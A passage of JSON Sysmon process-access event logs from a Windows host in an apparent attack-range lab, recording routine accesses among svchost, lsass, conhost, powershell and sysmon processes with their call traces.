07:03:46.435","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9248,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.435\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.435","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9249,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.435\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.435","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9250,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.435\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.435","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9251,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.435\r\nSourceProcessGUID: {E2A3D6B1-13D2-5F25-0000-0010631B1200}\r\nSourceProcessId: 3796\r\nSourceThreadId: 4948\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-13D2-5F25-0000-00106C1E1200}\r\nTargetProcessId: 1360\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.435","SourceProcessGUID":"{E2A3D6B1-13D2-5F25-0000-0010631B1200}","SourceProcessId":"3796","SourceThreadId":"4948","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-13D2-5F25-0000-00106C1E1200}","TargetProcessId":"1360","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9252,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.451\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.451","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9253,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.451\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.451","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9254,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.451\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.451","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9255,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.466\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13D2-5F25-0000-00106C1E1200}\r\nTargetProcessId: 1360\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 